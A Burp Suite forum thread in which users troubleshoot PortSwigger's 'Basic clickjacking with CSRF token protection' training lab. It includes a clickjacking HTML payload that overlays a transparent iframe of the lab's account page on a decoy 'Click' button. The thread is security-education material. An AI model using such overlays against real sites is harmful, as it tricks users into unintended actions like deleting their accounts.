Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

Basic clickjacking with CSRF token protection

Jean-Maurice | Last updated: Jun 17, 2024 07:43AM UTC

I'm having trouble with this lab. When I click on 'View exploit' I have the login page coming up, of course with no 'delete' button. I'm using Burp's browser Chromium and here's my script, of course I'm changing the lab Id and keep the 'https://' : <style> iframe { position: relative; width: 1000px; height: 1000px; opacity: 0.5; z-index: 2; } div { position: absolute; top: 470px; left: 70px; z-index: 1; } </style> <div>Click</div> <iframe src="https://YOUR-LAB-ID.web-security-academy.net/my-account"> </iframe> I also tried with /my-account?id=wiener, for the same result. What am I doing wrong ? Thanks

Ben, PortSwigger Agent | Last updated: Jun 19, 2024 05:00AM UTC

Hi Jean-Maurice, There is currently an issue with using the Clickjacking labs in conjunction with Burp's embedded browser. You should, however, still be able to use a standard version of Chrome and get these labs to work - if you try a standard version of Chrome, alongside the written solution (adapted with the specific values required for your elements to line up), does this then allow you to solve this lab?

Jack | Last updated: Jul 17, 2024 07:40PM UTC

hi when can u fix this? it does not work with none of the browsers. Maybe accepting the solutions could be more dynamic for these labs because nothing works (chrome, burp browser, opera, edge, firefox, NOTHING)

Ben, PortSwigger Agent | Last updated: Jul 18, 2024 08:02AM UTC

Hi, Again, having run through this lab using a standard version of Chrome (version 126.0.6478.127) this lab still works with the written solution.

RM | Last updated: Sep 30, 2024 07:14AM UTC

I just went through the same issue getting this lab to pass on Firefox, Edge and Chrome. On a fresh Chrome install, what fixed it for me was having the "Safe Browsing" setting to "Standard Protection". The lab will not work if "Enhanced Protection" is on. Hope this helps others.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.